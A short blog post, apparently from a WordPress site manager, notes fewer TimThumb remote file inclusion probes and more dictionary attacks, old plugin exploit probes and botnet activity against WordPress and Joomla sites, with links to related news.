Fewer TimThumb Attacks
Are We Seeing an End to Timthumb Attacks on WordPress?
Lately we have seen a decline in the number of TimThumb RFI attacks against our WordPress sites. A year ago this was the most common hacking probe logged for every WordPress site we manage. Back then we’d see a lot; from 10 to 50, sometimes more, different sources a day. Hardly a day would go by without at least one hacker looking for the vulnerability.
Over the last 6 months, the number of witnessed attempts has declined. Sometimes we don’t see a single probe looking for the old, vulnerable, timthumb.php / thumb.php script for several days.
Is it possible hackers are giving up looking for the out-of-date script? It’s 3 years since the vulnerability was identified and patched. Surely by now most WordPress installations are using later versions of core and plugins. Certainly there are still a few old sites with the exploitable scripts. Maybe the recent rise in botnet attacks, and all the security earnings are encouraging bloggers to update their sites.
TimThumb Attacks Drop, Other Attacks Increase
At the same time, we see lot more probes for other vulnerabilities. There’s been a sharp rise recently in dictionary attacks on wp-login / wp-admin. We’ve also seen many more probes looking for the WP OnlineStore (osCommerce exploit) also fixed over 2 years ago. Perhaps the difficulty in updating earlier versions of the plugin has left many sites running the old version?
We’ve also seen more botnets attacking WordPress, and more hacked websites being part of these botnets. The hacked sites aren’t limited to WordPress either. It looks like many Joomla users haven’t updated sites with the JCE editor exploit vulnerability, allowing a hacker botnet to gain a foothold.
- Massive Number Websites in Botnet (graphiclineweb.wordpress.com)
- WordPress admin accounts target of botnet attacks (venturebeat.com)
- Failure to patch leaves many WordPress sites vulnerable (pcworld.com)
- Hackers use botnet to scrape Google for vulnerable sites (infoworld.com)
- About Your WordPress Security… (eleanorprior.com)